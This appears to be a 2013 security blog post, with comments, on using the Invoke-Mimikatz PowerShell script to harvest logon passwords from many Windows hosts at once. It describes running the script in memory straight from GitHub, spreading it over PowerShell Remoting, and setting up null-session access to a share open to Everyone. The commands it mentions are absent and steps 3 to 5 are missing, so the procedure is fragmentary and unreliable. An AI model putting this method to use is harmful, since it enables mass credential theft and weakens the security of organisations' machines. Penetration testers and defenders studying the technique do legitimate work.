Friday, October 4, 2013

clymb3r recently posted a script called "Invoke-Mimikatz.ps1" basically what this does is reflectively injects mimikatz into memory, calls for all the logonPasswords and exits. It even checks the targets architecture (x86/x64) first and injects the correct DLL.

You can very easily use this script directly from an admin command prompt as so:

(This works REALLY well for Citrix and Kiosk scenarios and it's too hard to type/remember)
This runs the powershell script by directly pulling it from Github and executing it "in memory" on your system.

One of the awesome added capabilities for this script is to run on a list of hosts. as so:

This works great as all the output is directly on your system and all executed through Powershell Remoting. Powershell Remoting is pretty much the same as WinRM. This service however is not enabled by default and can be pretty hit or miss on how much any given enterprise uses WinRM. However, it is usually the servers and more important systems that have it enabled more often than not.

You can find WinRM / PowerShell Remoting by scanning for the service port 47001 as well as the default comm ports for WinRM 5985 (HTTP) and 5986 (HTTPS).

If you find that your target isn't a WinRM rich environment or you just want more passwords you can take a slightly more painful route, I call it "Mass Mimikatz"

Step 1. Make a share, we are doing this so we can not only collect the output of all our computers passwords, but to host the CMD batch file that will run the powershell script:

We are setting "Everyone" permissions on a Share (net share) and NTFS (icacls) level for this to work properly.

Step 2. Set registry keys. There are two registry keys that we need to set. The first allows Null Sessions to our new share and the second allows null users to have the "Everyone" token so that we don't have to get crazy with our permissions. I have create a meterpreter script that has a bunch of error checking here: massmimi_reg.rb

Step 6. Upload mongoose: Downloads Page - Both regular and tiny versions work. This is an awesome, single executable webserver that supports LUA, Sqlite, and WebDAV out of the box. Tiny version is under 100k.

Step 7. Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on. You'll have to gather this one way or another.

Step 8. Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default

6 comments:

Anonymous
said...

I'd rather get lsass.exe process memory (via procdump.exe for example) from everyone, and then run minidump from mimikatz in local(http://blog.gentilkiwi.com/securite/mimikatz/minidump)At least, you won't make any dll injection to any host but yours.

yeah but each of those outputs is about 40MB per host, more if its a big server. you may be in a position not to care about moving that much data around but if you have to pull it down to a remote host off the network you certainly will.

It's worth noting that there isn't "DLL injection" happening. PowerShell is reflectively loading mimikatz.dll in to the PowerShell process. The worst thing that could happen if the code has bugs is Powershell would crash, but NOT lsass.

Once I have valid creds I use psexec_commad to gain shells with powershell. I then wrote a metasploit post mod that will load mimikatz and dump the passwords to the creds db. I also wrote a resource file that will loop through all available sessions.